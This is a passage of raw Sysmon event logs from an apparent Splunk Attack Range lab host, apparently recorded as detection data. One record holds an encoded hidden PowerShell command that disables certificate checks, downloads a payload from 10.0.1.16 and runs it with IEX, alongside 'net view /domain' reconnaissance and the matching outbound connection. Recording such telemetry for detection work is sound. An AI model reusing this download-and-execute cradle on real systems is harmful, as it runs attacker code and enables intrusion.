18:14:44.611{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-4F14-613A-5790-03000000C801}4948C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.611{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F14-613A-5790-03000000C801}4948C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.616{B81B27B7-4F14-613A-5790-03000000C801}4948C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" view /domainC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035085134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.563{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=349F6B5CD571E009F372CB2B4A9D1536,SHA256=EF40AD2EC2BDC382A976FC97A20C9882A2DBD83012CE4F2894D72D5AA874BFDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.562{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C90FE35C7C492EA6BB430D8FA8BF4D30,SHA256=72376994D9E51EA2B6CF0D4C7A44C91B13C272C803A621A7459161B32AC98944,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.380{B81B27B7-4F14-613A-5690-03000000C801}52121032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F14-613A-5690-03000000C801}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F14-613A-5690-03000000C801}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.243{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F14-613A-5690-03000000C801}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.228{B81B27B7-4F14-613A-5690-03000000C801}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:44.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59451F256A6B661889B1930B7A7F2E25,SHA256=9AEBB20880113EEED6BDE847DB7194714FAA83493D18C5BA60FAE1FCE1ECACBD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.650{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-137netbios-nsfalse10.0.1.15win-host-987.attackrange.local137netbios-ns 354300x800000000000000035085158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.650{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local137netbios-nsfalse10.0.1.255-137netbios-ns 354300x800000000000000035085157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.650{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.15win-host-987.attackrange.local138netbios-dgm 354300x800000000000000035085156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.650{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 354300x800000000000000035085155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.619{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56701-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:45.719{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=349F6B5CD571E009F372CB2B4A9D1536,SHA256=EF40AD2EC2BDC382A976FC97A20C9882A2DBD83012CE4F2894D72D5AA874BFDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:45.633{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C64D6DE0E56C67260EE3683DD92C36A9,SHA256=87BB16051EC4DD84B18E8C65B3F2B8B4019D63160E9A8A99C5FC5187A1F7D3BD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:45.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35B5A82FFDB1621CBCA74FF5E20AA4B,SHA256=E469483403AC662EC3AC700C40136E857C43B8DB7968CA0CC56BD808B3A19E46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:46.233{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04784C3EC241476D534A268F0ED5B270,SHA256=B1C3B59F5ACB414C8D58C97A3777E872A534C67C533EBC89F67B2531CE89C442,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:47.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=273811949917521EEB125F8063D30944,SHA256=24A7E701B753378320A73D112FF2AEC22B4894859978E87097309E1D313F41E4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:48.264{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA08474D743F67090D6D266A64D5F67,SHA256=C0A4D2F55C67D72599F73BF7B644AC674BAC5D68AEA44C686F78EAB699047287,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:49.283{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80123AE7CBD4A4F9191FF2A8AF28984D,SHA256=E362FC89F65D2DE39674EC64681C1AA970C8092BC9EDB2C0A77E0E48B9C2BD1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.659{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.627{B81B27B7-4012-611D-1400-00000000C801}8841384C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.564{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.563{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 